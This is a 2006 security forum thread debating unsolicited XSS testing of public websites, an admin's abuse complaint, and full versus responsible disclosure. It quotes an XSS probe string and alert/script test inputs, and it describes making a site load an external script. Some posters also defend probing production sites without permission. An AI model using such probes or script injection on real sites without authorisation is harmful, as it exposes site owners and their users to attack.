As it seems it started from this board, I will post this here. I hope that's okay.
http://sla.ckers.org/forum/read.php?3,44,1292#msg-1292

First, I am one of the administrators on NukeCops. I don't run the server, nor generally do the day-to-day administration, but I would hope to start a discussion with you.

As I have just seen this blog and this site, I am trying to see exactly what you do and I would like to reply
http://ha.ckers.org/blog/20060930/nukecops-attempts-to-shut-hackersorg-down/
Despite maluc not wanting to email me, I should have had my email readily available. Ghost's message has lead me here.

I do understand the need to notify people about their vulnerabilities. But hitting every script on the site with such tests without any confirmation from the site owner's to run the scripts is just wrong. It can be taken, in the extreme, as a immediate malacious search for vulnerabilities to exploit - that is something we are trying to deal with for the many script kiddies using known robot exploits. These robots are causing massive damage, thus the only response to such measure is to report directly to their ISP.

It was, in-fact, a standard response that I sent after doing a simple whois. I do not go to every site that attempts such attacks. I imagine doing that would take lots and lots of time. Rather, the obvious intent to me (as to the nature of XSS exploits and the ha.ckers.org name) was something harmful.

Having deleted lots and lots of reports from the scripts you are using, it is likely that other phpNuke sites running security systems such as Nuke Sentinel will also see the pattern. It does not help your cause and will only inflame other people against you.

Having said that, I do appreciate you disclosing holes in the software. While I do not have any say on the original phpNuke product (that FB releases with many many many security problems), I do want the help with fixing and patching the software. Test it on the code we are putting out, even a test site if you want to be provided with one. But don't test it on people's production sites that are public... that will just bring out the hackers who will notice the chain of such attempts and use them in their own malacious actions.

My own perspective was that a site that professes to have a clue about security got rubbed the wrong way and the first reaction wasn't to fix the problem, but to put the blame on the messenger. Sending out an email to someone elses provider, which depending on the site could be their livelyhood, trying to shut them down is pretty fucking lame.

Rsnake nor I are in any way dependent on this site, and it costs us quite a bit in effort every day to maintain it, but there are many people who are dependent on their domain/servers/virtual presence for their income. To automaticly send out a message asking for an ISP to shut someone down over an issue on your own site is beyond just rude.

First off, welcome to the forums evader, and thanks for taking the time to discuss your views directly. And as you've likely already guessed, i'm going to disagree on your last statement..

Much akin to port-scanning, which is not illegal (IANAL) .. entering in non-normal inputs on a public website or wget-ing with query strings that usually never sent - is completely benign. If someone signs up for a new account name as MrSunshine!@#$%^&*()\/>< and it inadvertantly crashes your server .. then you may reason to claim downtime losses. However, searching for the string asdf'e"e>e<e changes nothing on your server (aside from access logs) nor does it negatively impact it in any way. To quote an old adage, 'No Harm, No Foul'.

My personal purpose for testing major sites I and others visit, is to raise awareness of how unsecure most every substantial website is. I am not taking into account the quilting site my grandmother visits http://mars.ark.com/~quilting/ .. From what i've seen, maybe 20% of major sites have no signs of filtering at all. Another 30% or so - yes i pulled these percentages out of my ass - filter the two main places Search and Login, and ignore everything else. That means registration forms, feedback messages, forgot password boxes, newletter signups, contest entries, etc, are all vulnerable to arbitrary injection. Most disheartening though, is that certainly fewer than 5% of websites i've checked have completed a once over with no exploitable vulnerabilities.

That is what gives me nightmares.. (that, or a mixture of vodka and Saved By The Bell reruns). To think, any website i visit could potentialy have a hidden iframe that uses CSRF to exploit an XSS hole on http://neopets.com and force me to send them my prized Kougra..
Isn't he cute~?

I don't know how i could continue on living, should that happen - not to mention my bank's website or my email host.

So yes, i am guilty of spamming the logs of many of those websites i posted about on http://sla.ckers.org/forum/read.php?3,44 with scary looking alert and <script> strings inside the page requests. Did i scare some of the admins into thinking their site was under attack? I certainly hope so. If 19 out of 20 of those admins have a hole on their site that a malicious person can take advantage of them or their users with, they ought to be scared. If they were competant, they could see where the pen-testing ended .. and locate their flaws. As a user myself, i'm sad to see that most every webmaster i entrust with my passwords and personal information, has no sense of web application security.

But back to your last statement, that we should only test your software and not your public-facing production site - i strongly disagree. The site that promotes the product is just as much their software as the product itself. Likewise, their is no download for my bank's website source code .. so i'm unable to test it on a test server in isolation. But i'll be damned if i take them at their word that noone can transfer 500$ out of my account everytime i visit their blog site.

The moral is: Don't hurt those who want to help you, and leave my Kougra out of this.

I guess, most people only agree partially with your posting.
It's true that full disclosure without reporting to responsible people first is not a nice way to do it.
But XSS is a well known vulnerabity since more than 6 years now, see
http://www.cert.org/advisories/CA-2000-02.html
It has been constantly ignored by managers and most web developers since then. Meanwhile XSS is used for sophisticated phishing attacks where the attacked user has no clue what's going on, nor can identify the attack *before* it took place. That's a real problem for the majority of internet users, who are not technically experianced, usually.

Now lets read your own text:

<cite>
I do understand the need to notify people about their vulnerabilities. But hitting every script on the site with such tests without any confirmation from the site owner's to run the scripts is just wrong. It can be taken, in the extreme, as a immediate malacious search for vulnerabilities to exploit - that is something we are trying to deal with for the many script kiddies using known robot exploits. These robots are causing massive damage, thus the only response to such measure is to report directly to their ISP.
</cite>

and we see that you wrote about the problem yourself, which most admins do not take care of (including yourself?): script kiddies penetrating just for fun using ready-to-use tools and exploits. Does anyone with a criminal intent asks you before starting such scripts? I doubt.
Why do web developers consequently ignore these threats and continue to implement vulnerable web pages?
Why get pen testers and nice people being attacked by hedge laywers if they send a kindly reminder about such vulnerabilities?

After 6 years of educating XSS and its descendants like CSRF, web pages *must* not have such simple holes.

As companies won't spend money for secure web sites but for hedge laywers, there are not much alternatives than full disclosure without a warning. XSS is still to simple to do. These companies get what they want to have: publicity.

And also have to agree with maluc, that testing for XSS is *not illegal*, except one has written it on each and every page where it should not be done.
But if I'd find a page with such a warning, I'd be pretty sure that it is insecure and never been visited anymore ;-)

Further more, or more worse, just depends ..., maluc wrote:
> .. guilty of spamming the logs of many of those websites ..
most admins are not aware that there is is another kind of attack possible: second order code injection, which might enable attackers to take over an admin session if the admin interface to web server or whatever is a web GUI.

I guess most companies would be well educated, if they get rid of hedge lawyers, marketing and advertising people and spend the money for good web developers, if security -including customer security- counts.

Moral: who is responsible for the vulnerabilties? for sure not the poeple who disclose it to you. You should be happy that you get it for free.
Does you hedge lawyer work for free?

Hello, Evaders99, and welcome to the board. I've got to say, I'm really happy that you took the time to write, and I wish this had come a few days ago - it would have saved us both some pain. That said, I have a few comments on what you said, as I'm sure you would have expected.

First, I would tend to aggree with you that hitting every site function is wrong, but that is assuming I believed that the site I was hitting already had the security in place to protect me. What the people on this list are doing is proving that which no one else does. As painful as it is to hear, you aren't secure. Nor is just about any other site on the Internet. So aside from spamming a log file or two, I believe what Ghozt and Maluc have done is help your awareness of your insecurities. It's a small price to pay for a free penetration test in the long run, which you couldn't afford or didn't want to do yourself.

The fact that you said you don't go to every site that attempts these attacks is actually slightly troubling. What if the attack was coming from a Yahoo address? Would you ask their upstream to shut Yahoo down? I can redirect through Yahoo (and a host of other sites). It's irresponsible not to check the site and insure that what you are demanding be shut down (via terms of service or copywrite infringement or otherwise) be an actual site that needs to be shut down. By your logic it would be extremely trivial to trick your logs into getting lots of benign organizations shut down.

Believe it or not, I'm not particularly worried about inflaming people who have security flaws in their software. Right now it's like the whole world is asleep at the helm. If their logs show some bad activity and indeed they are vulnerable to it, they should get inflamed and they should react (not against me or Ghozt or Maluc or anyone else but against the hole that they are vulnerable to). Don't you see? You're reacting to an itch by tearing off your arm. You're reacting to a symptom instead of fixing the cause.

Right now the internet is so ridden with holes it doesn't matter if what we do... they're going to be there either way. What this list does is raise awareness - yours clearly is now raised too. So let's put down arms and work together to fix the issues.

I did not attempt to shut you guys down personally. I have detected many such scripting and other attacks from previous hosts, many I do notify have stopped such Javascripts and other code from compromised servers and hacking groups. I don't have the time to personally visit and check out every Javascript attack against my sites.
If it is someone like Yahoo that is hosting, I will report to their abuse department. Given that your whois was registered by proxy, and the thumbnail of the www.ckers.org site seemed to go no where, my impression was that it was a malacious hacking group.
http://whois.domaintools.com/ckers.org

I certainly understand you want to notify people of their problems. But do you want people to go around to the houses in a neighborhood and try to open windows and doors when no one is home? Further, do you want them positively mark these openings for other people to exploit, without any notification to their ownever?

At best, what you are doing is unethical. Malacious or not, I think you disrepect the people running the sites and their users. You could ask them before hand (I would have easily said yes) and tell them in private what tests are done. Further, you mark these openings in a public forum for others to go at them.

I do take such concerns seriously and frequent the main sites such as securityfocus and secunia. But such zero-day attacks (as seen against many products these days) only encourage others hackers to follow and does not help any end user nor their developers.

I don't question your motives, but your methods. You don't have to warn people about nuclear weapons by exploding a nuke. :) Even under Sonic's own Network Abuse
# Attempts to hack the Sonic.net, Inc. network or *HIGHLIGHT* any other network or systems *HIGHLIGHT*
# Port scanning
There are simular terms for other networks. Your host may not feel that this is illegal, but "ethical hacking" is still hacking. If the results of such hacking causes damage in any way, you could be liable ... at least under US law. Not saying that would ever happen realistically, but you are using the "ends to justify the means"

Those are my complaints... I know you probably won't do anything. But I would like you to go through future releases of the software to check such issues. :)
My suggestion would be to make a better main page telling people who you are, as well as well as what the issues are and how to get them resolved.

# Attempts to hack the Sonic.net, Inc. network or *HIGHLIGHT* any other network or systems *HIGHLIGHT*

Evader, in what way, shape, or form did i hack your network or any other by inputting: asdf'e"e>e<e into your search box? Furthermore, last i checked i'm not affiliated with Sonic.net nor did i use their server to type in that input. Now I did send your website a request to make it then request ha.ckers.org/s.js which is indeed located on Sonic's network. but if i made it request google.com does that mean google is 'attacking' you? That's illogical at best, and completely retarded at worst. Furthermore, maybe you don't understand exactly what reflected XSS is.. It means send a request to a server and having it return a page that can be altered as i see it. Only me, myself, and i (and my imaginary friend Pedro) can view that page as it is. Anyone else on your site views it normally, and no files on your server have been altered. Where exactly were you 'hacked'? If anything, i hacked myself by proxy.

Furthermore, if i tell the world that i found a secret invisible button on the back of Wells Fargo ATMs that dispenses all the money it has, who is at fault here. The person who fondled the ATM (don't judge me. it's what i'm into.), or the company who shipped out ATMs with money dispensing buttons? Your analogy is flawed in that the house's windows are not in the public domain. If they left signs above every window saying 'Try to Open Me', then yes there is no problem in trying to lift them up, and in telling others that they are unlocked. Likewise, any public website - and by public i mean a general agreeance that anyone can visit view and utilize the non-member portions of your website - allows anyone to insert input and to request any pages they like. If you don't want them to access something, then you deny their request or alter it to an acceptable one. If i ask a bank teller for 50$ for free (in a non-threatening way), and they happily give it to me .. who just cost the bank 50$. Surely it wasn't me for requesting it, it was the bank teller for giving it out.

This is certainly not unethical. What's unethical is for websites who retain personal information of users divulged in confidence, to design web pages full of hole that will disclose their personal information. Now obviously we can't be expected to write bug-free software, and any website should be forgiven such transgressions provided they make due diligence to secure private information. When AOL publishes freely the private search information of 600,000 individuals, that is definitely not due diligence to respect there privacy.

And maybe you haven't been sliding deep enough through the intertubes, but all hackers are not evil. This forum does not discriminate by hat color nor intent, although most seem to be the security-minded whitehat type. I don't know how to convince you that hacking isn't evil by nature, anymore than owning a knife is evil. Yes it gives you more power, and the ability to do more destructive things.. but it comes down to intent. Should we outlaw all knives because some people get stabbed? You might find it tought to dig into that T-bone later.

We seem to envision to very different futures of an ideal internet - pardon me for putting words into your mouth here. You seem to envision one full of padded rooms with everyone scurying around in germless bubbles. I envision an internet full of scary man-eating monsters, with everyone walking safely past them carrying monster repellant. Don't leave home without it.

Evaders99, we understand your argumentation from the view of a manager responsible for a vulnerable site. But why are you upset about those people helping you, instead of blaming your web developers (or those responsible for their work)?

maluc gave you some more examples about ethic. To quote your "you are doing is unethical", you're barking up the wrong tree, think of following:
*your* web site is unethical, 'cause the XSS flaw allows criminals to damage your customers/visitors browser using *your* web site which the visitor trusts in.

"But such zero-day attacks"
There was no attack as maluc already explained. The site was used in the intended manner, at least the site did not tell everyone that the input of asdf'e"e>e<e is illegal and a violation against something, whatever.

Please make yourself used to XSS and how it works, the web site is the culprit, not it's users! You only may argue, that the user beeing shown the virtual defaced site is guilty by herself 'cause calling such a malicious URL. But then you render moot the core feature of HTML: links.

And finally, you probably may read Article 19 of "Universal Declaration of Human Rights", Resolution 217 A (III), 10. December 1948
And surprise: you see that it covers internet ages before it (internet) was even known ;-)

My intention was to start a discussion. If I seem personally upset, I apologize ... I don't think all "hackers" are bad. Nor do I want to attempt to stop what you are doing.

We can agree to disagree on the ethics on this. I just hope you will make better policies such that webmasters are notified that you are using their site for such purposes. You cannot possibly require that every site should have a clear disclaimer against "scanning for XSS vulnerabilities." No one is saying you don't have the right to do so. But as a matter of professional protocol, I think you'd have a lot more support by a private disclosure and better information available.

Just the time it took to figure out what this is, should be an indication of issues that you may have in the future.

(On a seperate note, the Universal Declaration of Human Rights has no real legal basis. It is such a joke, esp with this clause:
- These rights and freedoms may in no case be exercised contrary to the purposes and principles of the United Nations.)

Yes, in a perfect world where most sites and software are secure, and only a few bugs exist .. private disclosure is probably for the best, to mitigate evil people from using the otherwise public knowledge for malicious purposes. The problem is, that the vast majority of websites are vulnerable, and almost every major software program has had some rather bad bugs in it. When everyone keeps all these issues hushed .. it only hinders future software/websites as a whole. Currently, most 'web designers', yes even most the ones who do it professionally .. hell, even the ones who do it professionally for web app security vendors - don't know how to properly prevent XSS. They're only vaguely aware as a whole that they even need to prevent such vulnerabilities.

That's grossly unnacceptable. The purpose of that thread, in my own eyes, is to draw awareness in a more friendly way .. that these problems are widespread and that the intardnet is badly broken.

The digital world needs to realize how serious an issue XSS/SQL injection is - and web "masters" needs to wake up to the world that is Input/Output Validation.

Public knowledge of this helps far more than it hurts. Sorry if you lose some face in the process.

Much of the problem is that they are never taught good (read as: secure) scripting practices. Here's a nice suggestion from w3schools.com, which to be fair is one of the best resources on the internet for learning web app languages.

Quote
Form Validation

User input should be validated on the browser whenever possible (by client scripts (JavaScript)). Browser validation is faster and you reduce the server load.

You should consider using server validation if the user input will be inserted into a database. ...

Everything needs to be server side validated, otherwise it allows XSS. Easier on the server, yes, but a terrible thing to ever rely on the truthiness of the browser..

> .. better policies such that webmasters are notified ..
IMHO that's exactly the point: the webmaster is not responsible for the flaws, usually.
The disclosure should address those people responsible for the web site at a whole (corporate identity) and those people limiting or cutting off the budget for well edecated web developers. Not that w3schools,com is that bad, but if you have web developers on your pay roll which use this resource to build you business web site, there's definitely something wrong.

> .. Universal Declaration of Human Rights has no real legal basis.
ok, we agree that most business driven counties don't accept these ethics, no surprise: money rules.
That's exactly why we need full disclosures: money rules, in this case that money not spend for building secure web applications
But why you then complain? the information here is free;-)

You see, we need some sarcasm too in a real world. In a perfect world there would be no web applications with XSS vulnerabilities, which allow criminals to make their money for free. In such a perfect world it would be sufficient to inform the webmaster, 'cause the manager and webmaster and developer can count on each other.

> My intention was to start a discussion.
Here we go. May be someone finds this all OT, but when talking about security you have to take care about technical, social, ethical and business things and afiliate all together in practical solutions (web applications here).

Quote
Much of the problem is that they are never taught good (read as: secure) scripting practices.

I agree. I think there's much to be done in the way of proper scripting.
This is something that you'll want to bring to the developers of the software.
I just hope you don't punish the end user by lighting up a vulnerability that they may not understand, and really have no hope of fixing.

I find that most people install through such pre-packages as Fantastico. They don't know what XSS is. They just want to build something for their users to use.

For example, there are ways to notify a homeowner if their back door is open:
- actually going through their door and putting up a sign that says "thieves enter here"
- Or giving them a call and notifying them, as well as who to talk to about it (say a security expert?)

Quote
but when talking about security you have to take care about technical, social, ethical and business things and afiliate all together in practical solutions (web applications here).

I agree. It should be something a plan that includes the webmasters, web hosts and web developers, as well as security experts such as yourself. Brute forcing XSS checks on a site seems counter to that plan, just as port scanning without the network administration being involved wouldn't be as effective.

Perhaps the problem I see is where you plan to go after the XSS has been attempted and disclosed. Is it going up to the developer of the software? Or up to sites such as SecurityFocus?

I see very little else about who you are, took a while just to find the blog
http://ha.ckers.org/blog/about/
That page would not give me much assurance into who you guys are, what your reputation is, and what you are doing on other sites.

Further, is there anything that prevents others from using your methods for malacious actions?

QuoteFurther, is there anything that prevents others from using your methods for malacious actions?

Not particularly. But that is rather unstoppable. It's like writing a book, "Theory of Disembowling" (who would write a book like that?) and being blamed for people using your techniques to kill someone. While you, the author, was just elaborating in theory, about what could be done and ways to do it.

QuoteFor example, there are ways to notify a homeowner if their back door is open:
- actually going through their door and putting up a sign that says "thieves enter here"

I am not a lawyer, but this is usually illegal when you get full access to a server. However, this is exactly what an alert("XSS") does. And with such non resident XSS, there is no trespassing on the computer as far as US law is concerned.

So yes, pointing out a vulnerability is not illegal. Exploiting them to gain access, even with good intentions, is. I try not to break the law, when webmasters much like yourself misinterpret such good intentions.

I agree that the information can equally be used for bad things. However, your missing the point. Finding these holes is ridiculously easy - pretty much any skript kiddie could do it. Disclosing the information hardly saves them much effort, but it does give the good guys the ability to collectively look at the results and point out the more interesting examples. Without each of us having to go locate them.

The About page of what this forum is for, is indeed non-existant. Then again, neither does http://www.nukecops.com from what i see .. so right back at ya. We're not some ethical hacking group. We're not a group at all. It's just a public forum for experts, researchers, students, hackers, evil hackers, and the curious alike .. to discuss web app security or the lack thereof.

I think Evader has 2 issues here:
- the scanning of sites for XSS (what evader calls "going through the door".)
- the public posting of the results (that'd be the "thieves enter here" sign.)

I believe the initial reaction of trying to get the "attacker" shut down was based entirely on the log, not on the public postings.

So it boils down to: Is it legal to scan a public site for XSS, and is it responsible?

IANAL, nor do I play one on forums, but the responsibility argument requires a few questions to be answered:
- Is the intent of the scan to cause damage?
- Is the effect of the scan to cause damage?
- Is the intent of the scan to ultimately improve the safety of a site's users?
- Is the effect of the scan to ultimately improve the safety of a site's users?

The first two questions are clearly no.
The third question is a yes, I believe.
What about the fourth?

While it's true that once the bugs that have been found are fixed, the users' safety has been improved, Evaders' criticism is that by publishing the bugs before notifying the site itself, the risk to users is actually increased during the period of time starting when the bug is publicized and ending when the bug gets fixed.

I can't help but agree with that view, which is why I make a point to try and notify sites first, and only publish once the problem is corrected.
The problem here is that it takes me easily 3 times as long to find a reasonable point of contact to report security issues than it does to find the bug in the first place, which doesn't exactly make it easy for me to do the "right thing".

Ultimately, this falls back into the old "Full Disclosure" vs "Responsible Disclosure" argument.
I personally respect people on both side of that argument, as long as they pick their side for the right reasons.

Evaders99, I had a few comments regarding your last statements "I see very little else about who you are, took a while just to find the blog"

I don't know how that would be possible. Firstly, you reported "ha.ckers.org/xss.js" all you had to do was look at the root directory to find the blog. Oooor Google for "ckers.org" oooor, look at the JS file itself that says the root domain, oooor, any one of a dozen other recon techniques. It's not exactly like I make any attempt hide it or the other domains. But to your point, I should probably make it even more obvious for the people who have no recon skills by putting up a 301 redirect from the root of www.ckers to the root of ha.ckers.

That said, I still think you didn't do nearly the dilligence required (like emailing us if you had a problem with the site - or go after the person who actually performed the behavior you had a problem with rather than the site they pointed to). As I said, that could be used to get you to target any website for take-down if you don't do that basic recon.

The aboutus page is primarly a joke. I haven't changed it much since the first day I put it up. It doesn't say one way or another what the purpose of the website is, only who is running it. If you had questions, both our emails were attached though. But again, neither this website (nor the owners) did this to you, so it shouldn't matter what the point of this website is. If I had some other benign website host that file it shouldn't matter what their purpose was either.